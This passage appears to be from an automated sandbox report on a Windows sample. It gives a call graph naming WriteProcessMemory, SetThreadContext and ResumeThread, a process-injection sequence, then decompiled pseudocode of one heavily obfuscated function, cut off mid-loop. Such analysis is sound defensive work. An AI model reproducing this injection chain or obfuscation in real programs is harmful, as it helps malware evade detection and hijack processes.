6749->6742 6750->6742 6751 4146d5 WriteProcessMemory 6750->6751 6751->6742 6752 4146f0 SetThreadContext 6751->6752 6752->6742 6753 414710 ResumeThread 6752->6753 6753->6737 6753->6742 6754->6742 6759 4062c6 6755->6759 6756 4087e9 _malloc 66 API calls 6756->6759 6757 403150 6757->6736 6758 4088c2 _malloc 6 API calls 6758->6759 6759->6756 6759->6757 6759->6758 6762 4062ec std::bad_alloc::bad_alloc 6759->6762 6760 406312 6767 4062a9 6760->6767 6762->6760 6764 408783 __cinit 73 API calls 6762->6764 6764->6760 6766 40632a 6773 40857f 6767->6773 6770 4088ea 6771 408913 6770->6771 6772 40891f RaiseException 6770->6772 6771->6772 6772->6766 6774 40859f _strlen 6773->6774 6778 4062b9 6773->6778 6775 4087e9 _malloc 66 API calls 6774->6775 6774->6778 6776 4085b2 6775->6776 6777 409beb _strcpy_s 66 API calls 6776->6777 6776->6778 6777->6778 6778->6770 6780 414167 6779->6780 6780->6740 6781->6706 6783 407110 type_info::_Type_info_dtor 6782->6783 6784 40a28a __lock 66 API calls 6783->6784 6785 407117 6784->6785 6786 4071d0 __initterm 6785->6786 6789 407d91 __decode_pointer 6 API calls 6785->6789 6799 40721b 6786->6799 6791 40714e 6789->6791 6790 407218 type_info::_Type_info_dtor 6790->5760 6791->6786 6794 407d91 __decode_pointer 6 API calls 6791->6794 6793 40720f 6795 407014 _fast_error_exit 2 API calls 6793->6795 6798 407163 6794->6798 6795->6790 6796 407d91 6 API calls __decode_pointer 6796->6798 6797 407d88 6 API calls __init_pointers 6797->6798 6798->6786 6798->6796 6798->6797 6800 407221 6799->6800 6802 4071fc 6799->6802 6804 40a1b0 LeaveCriticalSection 6800->6804 6802->6790 6803 40a1b0 LeaveCriticalSection 6802->6803 6803->6793 6804->6802 6805 406f40 6806 406f7c 6805->6806 6807 406f52 6805->6807 6807->6806 6809 40a0c4 6807->6809 6810 40a0d0 type_info::_Type_info_dtor 6809->6810 6811 407fdd __getptd 66 API calls 6810->6811 6812 40a0d5 6811->6812 6815 40e97e 6812->6815 6816 40e9a4 6815->6816 6817 40e99d 6815->6817 6827 40a462 6816->6827 6818 4072c8 __NMSG_WRITE 66 API calls 
6817->6818 6818->6816 6822 40e9b5 _memset 6823 40ea8d 6822->6823 6825 40ea4d SetUnhandledExceptionFilter UnhandledExceptionFilter 6822->6825 6851 407246 6823->6851 6825->6823 6828 407d91 __decode_pointer 6 API calls 6827->6828 6829 40a46d 6828->6829 6829->6822 6830 40a46f 6829->6830 6834 40a47b type_info::_Type_info_dtor 6830->6834 6831 40a4d7 6832 40a4b8 6831->6832 6837 40a4e6 6831->6837 6836 407d91 __decode_pointer 6 API calls 6832->6836 6833 40a4a2 6835 407f64 __getptd_noexit 66 API calls 6833->6835 6834->6831 6834->6832 6834->6833 6840 40a49e 6834->6840 6838 40a4a7 _siglookup 6835->6838 6836->6838 6839 409c95 _strcat_s 66 API calls 6837->6839 6842 40a54d 6838->6842 6844 407246 _raise 66 API calls 6838->6844 6850 40a4b0 type_info::_Type_info_dtor 6838->6850 6841 40a4eb 6839->6841 6840->6833 6840->6837 6843 4094ac _strcat_s 6 API calls 6841->6843 6845 40a28a __lock 66 API calls 6842->6845 6846 40a558 6842->6846 6843->6850 6844->6842 6845->6846 6847 407d88 __init_pointers 6 API calls 6846->6847 6848 40a58d 6846->6848 6847->6848 6854 40a5e3 6848->6854 6850->6822 6852 407104 _doexit 66 API calls 6851->6852 6853 407257 6852->6853 6855 40a5f0 6854->6855 6856 40a5e9 6854->6856 6855->6850 6858 40a1b0 LeaveCriticalSection 6856->6858 6858->6855 6859 408340 6860 408379 6859->6860 6861 40836c 6859->6861 6863 409eb4 __atodbl_l 5 API calls 6860->6863 6862 409eb4 __atodbl_l 5 API calls 6861->6862 6862->6860 6869 408389 __except_handler4 __IsNonwritableInCurrentImage 6863->6869 6864 40840c 6865 4083e2 __except_handler4 6865->6864 6866 4083fc 6865->6866 6867 409eb4 __atodbl_l 5 API calls 6865->6867 6868 409eb4 __atodbl_l 5 API calls 6866->6868 6867->6866 6868->6864 6869->6864 6869->6865 6875 40babe RtlUnwind 6869->6875 6871 40845b __except_handler4 6872 40848f 6871->6872 6873 409eb4 __atodbl_l 5 API calls 6871->6873 6874 409eb4 __atodbl_l 5 API calls 6872->6874 6873->6872 6874->6865 6875->6871 7233 406282 7234 4085dc moneypunct 66 API calls 7233->7234 7235 406295 moneypunct 
7234->7235 7236 406f82 SetUnhandledExceptionFilter 7043 407e03 TlsAlloc 7237 40a684 7238 40a690 SetLastError 7237->7238 7239 40a698 type_info::_Type_info_dtor 7237->7239 7238->7239 7044 406505 7047 4064c3 7044->7047 7048 4064d6 7047->7048 7049 4064ef 7047->7049 7053 409692 7048->7053 7060 40973a 7049->7060 7052 4064df 7054 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7053->7054 7055 4096b8 7054->7055 7067 40d110 7055->7067 7057 4096d0 __ld12tod 7058 409eb4 __atodbl_l 5 API calls 7057->7058 7059 409738 7058->7059 7059->7052 7061 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7060->7061 7062 409760 7061->7062 7063 40d110 ___strgtold12_l 66 API calls 7062->7063 7064 409778 __ld12tod 7063->7064 7065 409eb4 __atodbl_l 5 API calls 7064->7065 7066 4097e0 7065->7066 7066->7052 7068 40d15b 7067->7068 7074 40d17a 7067->7074 7069 409c95 _strcat_s 66 API calls 7068->7069 7070 40d160 7069->7070 7071 4094ac _strcat_s 6 API calls 7070->7071 7076 40d170 7071->7076 7072 409eb4 __atodbl_l 5 API calls 7073 40d7d5 7072->7073 7073->7057 7074->7076 7077 40f152 7074->7077 7076->7072 7080 40f184 7077->7080 7078 409eb4 __atodbl_l 5 API calls 7079 40f31e 7078->7079 7079->7076 7080->7078 7092 406228 7093 406237 7092->7093 7094 40623d 7092->7094 7095 407246 _raise 66 API calls 7093->7095 7098 40726b 7094->7098 7095->7094 7097 406242 type_info::_Type_info_dtor 7099 407104 _doexit 66 API calls 7098->7099 7100 407276 7099->7100 7100->7097 7174 40a0e8 7175 40a0eb 7174->7175 7176 40e97e _abort 68 API calls 7175->7176 7177 40a0f7 type_info::_Type_info_dtor 7176->7177 6892 406e6a 6895 406de2 6892->6895 6894 406e88 6896 406e4e 6895->6896 6897 406def 6895->6897 6953 4066d3 6896->6953 6897->6896 6899 406df4 6897->6899 6901 406e12 6899->6901 6902 406df9 6899->6902 6900 406e33 6900->6894 6903 406e35 6901->6903 6906 406e1c 6901->6906 6909 406c2d 6902->6909 6940 4067c3 6903->6940 6923 406ce8 6906->6923 6967 409e24 6909->6967 6912 406c67 6913 409c95 _strcat_s 66 API calls 6912->6913 6915 406c6c 
6913->6915 6914 406c86 6977 409ca8 6914->6977 6916 4094ac _strcat_s 6 API calls 6915->6916 6922 406c78 6916->6922 6919 409eb4 __atodbl_l 5 API calls 6921 406ce6 6919->6921 6921->6894 6922->6919 6924 409e24 __fltout2 66 API calls 6923->6924 6926 406d19 6924->6926 6925 406d22 6927 409c95 _strcat_s 66 API calls 6925->6927 6926->6925 6928 406d44 6926->6928 6929 406d27 6927->6929 6932 409ca8 __fptostr 66 API calls 6928->6932 6930 4094ac _strcat_s 6 API calls 6929->6930 6931 406d33 6930->6931 6934 409eb4 __atodbl_l 5 API calls 6931->6934 6933 406d70 6932->6933 6933->6931 6935 406db7 6933->6935 6937 406d8f 6933->6937 6936 406de0 6934->6936 7021 406564 6935->7021 6936->6900 6939 406b36 __cftof2_l 76 API calls 6937->6939 6939->6931 6941 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6940->6941 6942 4067e8 6941->6942 6943 4067f7 6942->6943 6945 406827 6942->6945 6944 409c95 _strcat_s 66 API calls 6943->6944 6946 4067fc 6944->6946 6947 406835 6945->6947 6950 40683e 6945->6950 6949 4094ac _strcat_s 6 API calls 6946->6949 6948 409c95 _strcat_s 66 API calls 6947->6948 6948->6946 6952 40680b __alldvrm _memset __cftoa_l _strrchr 6949->6952 6950->6952 7040 4067a3 6950->7040 6952->6900 6954 409e24 __fltout2 66 API calls 6953->6954 6955 406704 6954->6955 6956 40670d 6955->6956 6957 40672c 6955->6957 6958 409c95 _strcat_s 66 API calls 6956->6958 6962 409ca8 __fptostr 66 API calls 6957->6962 6959 406712 6958->6959 6960 4094ac _strcat_s 6 API calls 6959->6960 6961 40671e 6960->6961 6964 409eb4 __atodbl_l 5 API calls 6961->6964 6963 406770 6962->6963 6963->6961 6966 406564 __cftoe2_l 76 API calls 6963->6966 6965 4067a1 6964->6965 6965->6900 6966->6961 6968 409e4f ___dtold 6967->6968 7003 40da31 6968->7003 6971 409beb _strcpy_s 66 API calls 6972 409e8a 6971->6972 6973 409e9d 6972->6973 6974 409384 __invoke_watson 10 API calls 6972->6974 6975 409eb4 __atodbl_l 5 API calls 6973->6975 6974->6973 6976 406c5e 6975->6976 6976->6912 6976->6914 6978 409cdd 6977->6978 6979 409cbf 6977->6979 
6978->6979 6980 409ce2 6978->6980 6981 409c95 _strcat_s 66 API calls 6979->6981 6983 409cf7 6980->6983 6987 409d05 _strlen 6980->6987 6982 409cc4 6981->6982 6984 4094ac _strcat_s 6 API calls 6982->6984 6985 409c95 _strcat_s 66 API calls 6983->6985 6986 406cb9 6984->6986 6985->6982 6986->6922 6989 406b36 6986->6989 6987->6986 6988 4097f0 ___sbh_free_block __VEC_memcpy 6987->6988 6988->6986 6990 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6989->6990 6991 406b54 6990->6991 6992 406b58 6991->6992 6996 406b8b 6991->6996 6993 409c95 _strcat_s 66 API calls 6992->6993 6994 406b5d 6993->6994 6995 4094ac _strcat_s 6 API calls 6994->6995 7002 406b6e _memset 6995->7002 6997 406bc7 6996->6997 7017 40651f 6996->7017 6999 40651f __shift __VEC_memcpy 6997->6999 6997->7002 7000 406bdc 6999->7000 7001 40651f __shift __VEC_memcpy 7000->7001 7000->7002 7001->7002 7002->6922 7006 40daa7 7003->7006 7004 40db14 7008 409beb _strcpy_s 66 API calls 7004->7008 7005 409eb4 __atodbl_l 5 API calls 7007 409e6a 7005->7007 7006->7004 7009 40db2c 7006->7009 7016 40dac4 7006->7016 7007->6971 7010 40db77 7008->7010 7011 409beb _strcpy_s 66 API calls 7009->7011 7012 409384 __invoke_watson 10 API calls 7010->7012 7010->7016 7013 40db4b 7011->7013 7012->7016 7014 409384 __invoke_watson 10 API calls 7013->7014 7013->7016 7014->7016 7015 40e329 7016->7005 7016->7015 7018 406528 _strlen 7017->7018 7019 406539 7017->7019 7020 4097f0 ___sbh_free_block __VEC_memcpy 7018->7020 7019->6997 7020->7019 7022 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7021->7022 7023 40657c 7022->7023 7024 406582 7023->7024 7025 4065b2 7023->7025 7026 409c95 _strcat_s 66 API calls 7024->7026 7028 4065c6 7025->7028 7029 4065cf 7025->7029 7027 406587 7026->7027 7030 4094ac _strcat_s 6 API calls 7027->7030 7031 409c95 _strcat_s 66 API calls 7028->7031 7032 40651f __shift __VEC_memcpy 7029->7032 7033 4065f3 7029->7033 7037 406596 7030->7037 7031->7027 7032->7033 7034 409beb _strcpy_s 66 API calls 7033->7034 7035 40664a 
7034->7035 7036 409384 __invoke_watson 10 API calls 7035->7036 7038 40665d 7035->7038 7036->7038 7037->6931 7038->7037 7039 4097f0 ___sbh_free_block __VEC_memcpy 7038->7039 7039->7037 7041 4066d3 __cftoe_l 76 API calls 7040->7041 7042 4067be 7041->7042 7042->6952 7101 40ba2c 7102 40ba3e 7101->7102 7104 40ba4c @_EH4_CallFilterFunc@8 7101->7104 7103 409eb4 __atodbl_l 5 API calls 7102->7103 7103->7104 7105 408630 7108 408620 7105->7108 7107 40863d moneypunct 7111 40baef 7108->7111 7110 40862e 7110->7107 7112 40bafb type_info::_Type_info_dtor 7111->7112 7113 40a28a __lock 66 API calls 7112->7113 7117 40bb02 7113->7117 7114 40bb3b 7121 40bb56 7114->7121 7116 40bb4c type_info::_Type_info_dtor 7116->7110 7117->7114 7118 40bb32 7117->7118 7120 40a989 type_info::_Type_info_dtor 66 API calls 7117->7120 7119 40a989 type_info::_Type_info_dtor 66 API calls 7118->7119 7119->7114 7120->7118 7124 40a1b0 LeaveCriticalSection 7121->7124 7123 40bb5d 7123->7116 7124->7123 7173 40edd0 RtlUnwind 6879 406551 6882 406425 6879->6882 6883 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6882->6883 6884 406439 6883->6884 6885 406252 6888 4084cc 6885->6888 6887 406257 6887->6887 6889 4084f1 6888->6889 6890 4084fe GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6888->6890 6889->6890 6891 4084f5 6889->6891 6890->6891 6891->6887 7081 406214 7084 4074ac 7081->7084 7085 407f64 __getptd_noexit 66 API calls 7084->7085 7086 406225 7085->7086 7240 4060b4 7241 4060be __cfltcvt_init 7240->7241 7246 406f17 GetModuleHandleA 7241->7246 7244 4060d3 7247 4060c3 7246->7247 7247->7244 7248 406eae 7247->7248 7253 40a058 7248->7253 7250 406ec3 7251 406ed4 7250->7251 7252 409384 __invoke_watson 10 API calls 7250->7252 7251->7244 7252->7251 7254 40a09c __control87 7253->7254 7256 40a073 __control87 7253->7256 7254->7250 7255 409c95 _strcat_s 66 API calls 7257 40a08d 7255->7257 7256->7255 7258 4094ac _strcat_s 6 API calls 7257->7258 7258->7254 7087 408716 7088 
40aa5c __calloc_crt 66 API calls 7087->7088 7089 408722 7088->7089 7090 407d16 __encode_pointer 6 API calls 7089->7090 7091 40872a 7090->7091 7182 407ff7 7183 408003 type_info::_Type_info_dtor 7182->7183 7184 40801b 7183->7184 7185 40a989 type_info::_Type_info_dtor 66 API calls 7183->7185 7187 408105 type_info::_Type_info_dtor 7183->7187 7186 408029 7184->7186 7188 40a989 type_info::_Type_info_dtor 66 API calls 7184->7188 7185->7184 7189 408037 7186->7189 7190 40a989 type_info::_Type_info_dtor 66 API calls 7186->7190 7188->7186 7191 408045 7189->7191 7192 40a989 type_info::_Type_info_dtor 66 API calls 7189->7192 7190->7189 7193 408053 7191->7193 7194 40a989 type_info::_Type_info_dtor 66 API calls 7191->7194 7192->7191 7195 408061 7193->7195 7196 40a989 type_info::_Type_info_dtor 66 API calls 7193->7196 7194->7193 7197 40806f 7195->7197 7198 40a989 type_info::_Type_info_dtor 66 API calls 7195->7198 7196->7195 7199 408080 7197->7199 7200 40a989 type_info::_Type_info_dtor 66 API calls 7197->7200 7198->7197 7201 40a28a __lock 66 API calls 7199->7201 7200->7199 7202 408088 7201->7202 7203 408094 InterlockedDecrement 7202->7203 7204 4080ad 7202->7204 7203->7204 7205 40809f 7203->7205 7218 408111 7204->7218 7205->7204 7208 40a989 type_info::_Type_info_dtor 66 API calls 7205->7208 7208->7204 7209 40a28a __lock 66 API calls 7210 4080c1 7209->7210 7211 409228 ___removelocaleref 8 API calls 7210->7211 7217 4080f2 7210->7217 7215 4080d6 7211->7215 7214 40a989 type_info::_Type_info_dtor 66 API calls 7214->7187 7216 409050 ___freetlocinfo 66 API calls 7215->7216 7215->7217 7216->7217 7221 40811d 7217->7221 7224 40a1b0 LeaveCriticalSection 7218->7224 7220 4080ba 7220->7209 7225 40a1b0 LeaveCriticalSection 7221->7225 7223 4080ff 7223->7214 7224->7220 7225->7223 7125 40653e 7128 4063b2 7125->7128 7129 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7128->7129 7130 4063c6 7129->7130 7137 409666 7130->7137 7132 4063d2 7133 4063e6 7132->7133 7141 409523 7132->7141 7135 409666 
__forcdecpt_l 101 API calls 7133->7135 7136 4063ef 7135->7136 7138 409684 7137->7138 7139 409674 7137->7139 7146 409551 7138->7146 7139->7132 7142 409531 7141->7142 7143 409543 7141->7143 7142->7132 7168 4094d2 7143->7168 7147 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7146->7147 7148 409566 7147->7148 7149 409572 7148->7149 7150 4095c6 7148->7150 7156 40958a 7149->7156 7158 40c598 7149->7158 7155 4095eb 7150->7155 7165 40c650 7150->7165 7151 409c95 _strcat_s 66 API calls 7154 4095f1 7151->7154 7157 40c050 ___crtLCMapStringA 101 API calls 7154->7157 7155->7151 7155->7154 7156->7139 7157->7156 7159 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7158->7159 7160 40c5ac 7159->7160 7161 40c5b9 7160->7161 7162 40c650 __isleadbyte_l 76 API calls 7160->7162 7161->7156 7163 40c5e1 7162->7163 7164 40c24f ___crtGetStringTypeA 90 API calls 7163->7164 7164->7161 7166 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7165->7166 7167 40c663 7166->7167 7167->7155 7169 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7168->7169 7170 4094e5 7169->7170 7171 4094ff 7170->7171 7172 40c598 __isctype_l 90 API calls 7170->7172 7171->7132 7172->7171 7226 4085ff 7229 4085dc 7226->7229 7228 40860c moneypunct 7230 4085f0 7229->7230 7231 4085e8 7229->7231 7230->7228 7232 40a989 type_info::_Type_info_dtor 66 API calls 7231->7232 7232->7230

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                            			E00403620() {
                                                                                                                                                                                            				signed short* _v8;
                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                            				signed int _v13;
                                                                                                                                                                                            				short* _v20;
                                                                                                                                                                                            				unsigned int _v24;
                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                            				signed short* _v40;
                                                                                                                                                                                            				signed char* _v44;
                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                            				signed short* _v52;
                                                                                                                                                                                            				signed short* _v60;
                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                            				signed char* _v68;
                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                            				signed char* _v76;
                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                            				signed char* _v96;
                                                                                                                                                                                            				void* _v100;
                                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                            				signed int* _v120;
                                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                                            				signed int _v125;
                                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                                            				intOrPtr* _v140;
                                                                                                                                                                                            				char _v144;
                                                                                                                                                                                            				signed short* _v148;
                                                                                                                                                                                            				intOrPtr _v152;
                                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                                            				intOrPtr _v160;
                                                                                                                                                                                            				signed char* _v164;
                                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                                            				intOrPtr _v176;
                                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                            				union _LARGE_INTEGER _v196;
                                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                                            				signed int _v201;
                                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                                            				intOrPtr _v220;
                                                                                                                                                                                            				char _v224;
                                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                                            				signed int* _v232;
                                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                                            				signed char* _v248;
                                                                                                                                                                                            				signed int _v252;
                                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                                            				signed int _v257;
                                                                                                                                                                                            				signed int* _v264;
                                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                                            				signed int _v281;
                                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                                            				intOrPtr* _v292;
                                                                                                                                                                                            				signed int _v293;
                                                                                                                                                                                            				long _v300;
                                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                                            				char _v305;
                                                                                                                                                                                            				signed short _v312;
                                                                                                                                                                                            				void* _v328;
                                                                                                                                                                                            				signed int _v329;
                                                                                                                                                                                            				intOrPtr _v336;
                                                                                                                                                                                            				intOrPtr _v340;
                                                                                                                                                                                            				signed int* _v344;
                                                                                                                                                                                            				signed int _v348;
                                                                                                                                                                                            				int _v352;
                                                                                                                                                                                            				signed int* _v356;
                                                                                                                                                                                            				signed int _v357;
                                                                                                                                                                                            				signed int _v364;
                                                                                                                                                                                            				signed int _v368;
                                                                                                                                                                                            				void* _v372;
                                                                                                                                                                                            				signed int* _v376;
                                                                                                                                                                                            				signed int _v380;
                                                                                                                                                                                            				signed int _v381;
                                                                                                                                                                                            				signed int _v383;
                                                                                                                                                                                            				signed int _v384;
                                                                                                                                                                                            				signed short* _v388;
                                                                                                                                                                                            				signed int _v392;
                                                                                                                                                                                            				signed int* _v396;
                                                                                                                                                                                            				void* _v400;
                                                                                                                                                                                            				void* _v404;
                                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                                            				char _v409;
                                                                                                                                                                                            				intOrPtr _v416;
                                                                                                                                                                                            				intOrPtr _v420;
                                                                                                                                                                                            				intOrPtr _v424;
                                                                                                                                                                                            				void* _v428;
                                                                                                                                                                                            				signed int _v432;
                                                                                                                                                                                            				signed int _v433;
                                                                                                                                                                                            				intOrPtr _v440;
                                                                                                                                                                                            				signed short _v444;
                                                                                                                                                                                            				signed char* _v448;
                                                                                                                                                                                            				signed int _v452;
                                                                                                                                                                                            				signed int _v456;
                                                                                                                                                                                            				signed int* _v460;
                                                                                                                                                                                            				signed int _v461;
                                                                                                                                                                                            				signed int _v468;
                                                                                                                                                                                            				void* _v472;
                                                                                                                                                                                            				signed short* _v476;
                                                                                                                                                                                            				unsigned int _v480;
                                                                                                                                                                                            				intOrPtr _v772;
                                                                                                                                                                                            				signed int _v776;
                                                                                                                                                                                            				char* _v780;
                                                                                                                                                                                            				signed int _v784;
                                                                                                                                                                                            				signed int _v788;
                                                                                                                                                                                            				signed int _v792;
                                                                                                                                                                                            				char _v796;
                                                                                                                                                                                            				signed int _v800;
                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                            				signed int _v808;
                                                                                                                                                                                            				char _v812;
                                                                                                                                                                                            				char _v816;
                                                                                                                                                                                            				signed int _v820;
                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                            				signed short _t1682;
                                                                                                                                                                                            				signed int _t1697;
                                                                                                                                                                                            				long _t1732;
                                                                                                                                                                                            				signed char* _t1852;
                                                                                                                                                                                            				signed short* _t1884;
                                                                                                                                                                                            				signed int _t1918;
                                                                                                                                                                                            				signed short** _t1921;
                                                                                                                                                                                            				intOrPtr _t1993;
                                                                                                                                                                                            				intOrPtr _t2022;
                                                                                                                                                                                            				signed char* _t2338;
                                                                                                                                                                                            				signed char* _t2421;
                                                                                                                                                                                            				signed int _t2429;
                                                                                                                                                                                            				signed short* _t2433;
                                                                                                                                                                                            				signed int _t2816;
                                                                                                                                                                                            				signed int _t2825;
                                                                                                                                                                                            				signed char* _t2911;
                                                                                                                                                                                            				void* _t3173;
                                                                                                                                                                                            
                                                                                                                                                                                            				_v201 = 0x41;
                                                                                                                                                                                            				_v364 = 0x5953;
                                                                                                                                                                                            				_v468 = 0x5a9;
                                                                                                                                                                                            				_v76 =  &_v201;
                                                                                                                                                                                            				_v236 = 0xbdd;
                                                                                                                                                                                            				_v357 = 0x44;
                                                                                                                                                                                            				_v452 = _v468;
                                                                                                                                                                                            				_v88 = _v236;
                                                                                                                                                                                            				_v64 = 0xa27b;
                                                                                                                                                                                            				_v212 = _v364;
                                                                                                                                                                                            				_v344 =  &_v212;
                                                                                                                                                                                            				if( *_v344 + _v364 != _v212) {
                                                                                                                                                                                            					if(_v468 - 0x653 < _v452) {
                                                                                                                                                                                            						_v240 = 0xf37e;
                                                                                                                                                                                            						_v44 =  &_v357;
                                                                                                                                                                                            						_v172 = _v88;
                                                                                                                                                                                            						_v416 = 0x4790;
                                                                                                                                                                                            						_v257 =  *_v76;
                                                                                                                                                                                            						_v772 = 0x11c;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					 *0x414004 = _v452 * _v468; // executed
                                                                                                                                                                                            				}
                                                                                                                                                                                            				E00403180(); // executed
                                                                                                                                                                                            				_v784 = _v88 & 0x0000ffff;
                                                                                                                                                                                            				if(_v784 == 0x969) {
                                                                                                                                                                                            					 *_v344 =  *_v344 >> _v364;
                                                                                                                                                                                            					_v240 = _v240 ^ 0x000030aa;
                                                                                                                                                                                            					L123:
                                                                                                                                                                                            					_v452 = _v468 &  *0x414004;
                                                                                                                                                                                            					return _v776;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v476 =  &_v88;
                                                                                                                                                                                            				_v424 = 0xd0e2;
                                                                                                                                                                                            				_v68 =  &_v357;
                                                                                                                                                                                            				_v788 = _v364;
                                                                                                                                                                                            				if(_v788 == 0x5953) {
                                                                                                                                                                                            					_v60 =  &_v172;
                                                                                                                                                                                            					if(( *_v44 & 0x000000ff & _v357 & 0x000000ff) < ( *_v68 & 0x000000ff)) {
                                                                                                                                                                                            						E004034C0(_v468 & 0x0000ffff, _v468 & 0x0000ffff, _v257 & 0x000000ff, _v240);
                                                                                                                                                                                            						_t3173 = _t3173 + 0x10;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_v256 = _v240;
                                                                                                                                                                                            					_v776 =  *_v344;
                                                                                                                                                                                            					_v40 = 0x414004;
                                                                                                                                                                                            					_v164 =  &_v201;
                                                                                                                                                                                            					_v236 = ( *_v60 & 0x0000ffff) * ( *_v476 & 0x0000ffff);
                                                                                                                                                                                            					_v336 = 0xbe43;
                                                                                                                                                                                            					_v384 =  *_v68;
                                                                                                                                                                                            					_v120 =  &_v256;
                                                                                                                                                                                            					if( *_v120 + _v256 < _v240) {
                                                                                                                                                                                            						L120:
                                                                                                                                                                                            						 *_v344 = _v212 - _v364;
                                                                                                                                                                                            						_v212 =  *_v344 + _v776;
                                                                                                                                                                                            						_v240 =  *_v120 - _v256;
                                                                                                                                                                                            						goto L122;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_v168 =  *_v344;
                                                                                                                                                                                            					_v300 = GetVersion();
                                                                                                                                                                                            					_v388 =  &_v88;
                                                                                                                                                                                            					_v13 = _v384;
                                                                                                                                                                                            					_v168 =  *_v344 >> _v776;
                                                                                                                                                                                            					_v792 = _v256;
                                                                                                                                                                                            					if(_v792 == 0xb150) {
                                                                                                                                                                                            						 *_v76 =  *_v164 - _v201;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						if(_v792 == 0xf37e) {
                                                                                                                                                                                            							_v232 =  &_v256;
                                                                                                                                                                                            							_v796 = _v13;
                                                                                                                                                                                            							if(_v796 == 0x16) {
                                                                                                                                                                                            								E00403570();
                                                                                                                                                                                            								_v364 =  *_v344 ^ _v776;
                                                                                                                                                                                            								 *_v344 =  *_v344 << _v168;
                                                                                                                                                                                            							} else {
                                                                                                                                                                                            								if(_v796 == 0xfd) {
                                                                                                                                                                                            									_v172 = _v236 & 0x0000ffff | _v88 & 0x0000ffff;
                                                                                                                                                                                            									_v384 = _v13 & 0x000000ff & _v357 & 0x000000ff;
                                                                                                                                                                                            								}
                                                                                                                                                                                            							}
                                                                                                                                                                                            						}
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_v272 = _v468;
                                                                                                                                                                                            					_v24 = _v240;
                                                                                                                                                                                            					_v84 = _v212;
                                                                                                                                                                                            					_v357 = ( *_v44 & 0x000000ff) + ( *_v68 & 0x000000ff);
                                                                                                                                                                                            					_v156 = _v88;
                                                                                                                                                                                            					while(_v424 < 0xe58c) {
                                                                                                                                                                                            						 *_v120 = _v24 +  *_v232;
                                                                                                                                                                                            						_v168 = _v212 - _v84;
                                                                                                                                                                                            						 *_v344 =  *_v344 & _v84;
                                                                                                                                                                                            						_v240 =  *_v232 + _v24;
                                                                                                                                                                                            						_v13 = (_v384 & 0x000000ff) - (_v357 & 0x000000ff);
                                                                                                                                                                                            						_v352 = AreFileApisANSI();
                                                                                                                                                                                            						_v156 = ( *_v476 & 0x0000ffff) - (_v236 & 0x0000ffff);
                                                                                                                                                                                            						_v212 = _v776 + _v84;
                                                                                                                                                                                            						_v212 =  *_v344 << _v84;
                                                                                                                                                                                            						_v256 =  *_v232 >>  *_v120;
                                                                                                                                                                                            						 *0x414004 = _v272 | _v452;
                                                                                                                                                                                            						_v424 = _v424 + 0x73;
                                                                                                                                                                                            						 *_v344 =  *_v344 ^ _v364;
                                                                                                                                                                                            						_v272 = _v468 &  *0x414004;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_v281 =  *_v76;
                                                                                                                                                                                            					_v13 = ( *_v68 & 0x000000ff) * (_v357 & 0x000000ff);
                                                                                                                                                                                            					_v176 = 0xac40;
                                                                                                                                                                                            					 *_v476 = ( *_v388 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
                                                                                                                                                                                            					_v376 =  &_v256;
                                                                                                                                                                                            					_v108 = _v84;
                                                                                                                                                                                            					_v236 = (_v172 & 0x0000ffff) - ( *_v60 & 0x0000ffff);
                                                                                                                                                                                            					do {
                                                                                                                                                                                            						_v357 = ( *_v68 & 0x000000ff) - (_v384 & 0x000000ff);
                                                                                                                                                                                            						_v256 =  *_v232 + _v24;
                                                                                                                                                                                            						_v84 = _v168 +  *_v344;
